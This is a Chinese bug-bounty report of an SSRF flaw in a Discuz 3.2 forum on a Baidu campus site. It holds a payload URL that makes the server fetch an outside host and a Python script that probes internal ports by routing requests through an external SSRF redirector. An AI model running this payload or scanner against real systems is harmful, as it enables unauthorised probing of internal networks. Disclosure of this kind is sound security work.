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漏洞状态：已忽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漏洞名称：百度一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SSR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（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po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提交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18-04-10 16:22:49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漏洞类型：应用漏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设计缺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逻辑错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危害等级：高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奖励积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漏洞描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发现方式：请尽量详细描述，保留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截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重现方法等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百度某站点使用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discuz3.2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2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存在一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SSR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通用漏洞，简单的测试了一下存在访问情况，以及打到百度公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p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漏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ayload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8525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http://campus.baidu.com/forum.php?mod=ajax&amp;action=downremoteimg&amp;message=[img]http://vdqlcz.ceye.io/dict.php?data=helo.jpg[/img]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漏洞证明：请在这里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OC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用脚本探测一下内网端口，加以确认该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mport requests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mport threading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mport Queue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mport time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hreads_count = 2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que = Queue.Queue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ock = threading.Lock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hreads = []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orts = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]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or i in ports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que.put(str(i)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ef run()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while que.qsize() &gt; 0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 = que.get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rint p + "       \r",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ry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url = "http://campus.baidu.com/forum.php?mod=ajax&amp;action=downremoteimg&amp;message=[img]http://fuzz.90fox.com/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=hello.jpg[/img]".format(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ort=p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r = requests.get(url,timeout=2.8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xcept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ock.acquire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rint "{port}  Open".format(port=p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ock.release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or i in range(threads_count)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 = threading.Thread(target=run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hreads.append(t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.setDaemon(True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.start(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while que.qsize() &gt; 0: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time.sleep(1.0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692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修复方案：请提供大致的修复方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1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